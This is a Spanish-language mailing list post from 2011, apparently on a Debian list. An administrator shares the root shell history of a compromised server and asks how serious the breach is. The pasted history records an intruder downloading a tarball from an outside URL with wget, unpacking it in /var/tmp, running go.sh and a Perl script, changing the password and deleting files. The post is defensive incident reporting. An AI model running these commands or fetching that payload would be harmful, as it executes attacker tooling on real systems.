2011/5/13 ciracusa
<ciracusa@gmail.com>
Lista, buenas tardes.
Perd�i este tema no esta directamente relacionado con Debian, pero como el server en cuesti�iene Squeeze y es un tema de seguridad creo que puede interesarles a mas de uno.
Ayer viendo el history de root de un servidor veo lo siguiente:
�314 �./go.sh 189
�315 �w
�316 �cd
�317 �cd /var/tmp/
�318 �rm -rf gosh
�319 �ls -a
�320 �exit
�321 �cat /proc/cpuinfo
�322 �passwd
�323 �cd /var/tmp/
�324 �cd gosh
�325 �touch bios.txt
�326 �chmod +x *
�327 �screen
�328 �exit
�329 �cat /proc/cpuinfo
�330 �cd /var/tmp/
�331 �ls -a
�332 �wget http://gblteam.webs.com/gosh.tgz.tar
�333 �tar zxvf gosh.tgz.tar
�334 �rm -rf gosh.tgz.tar
�335 �cd gosh
�336 �touch bios.txt
�337 �chmod +x *
�338 �./go.sh 200
�339 �cd
�340 �cd /var/tmp/
�341 �ls -a
�342 �rm -rf gosh
�343 �ls -a
�344 �exit
�345 �cd /var/tmp/
�346 �perl x.pl
Que opinan?
Entiendo -lamentablemente- que el server fue comprometido, pero lo que no llego a comprender es el alcance de esto.
Notar que puse el link para que puedan descargarlo uds. tambi�y analizarlo (tomando las precauciones del caso).
Sub�l archivo del link que dejaste a un scanner online (virSCAN.org) y arroj�te resultado.�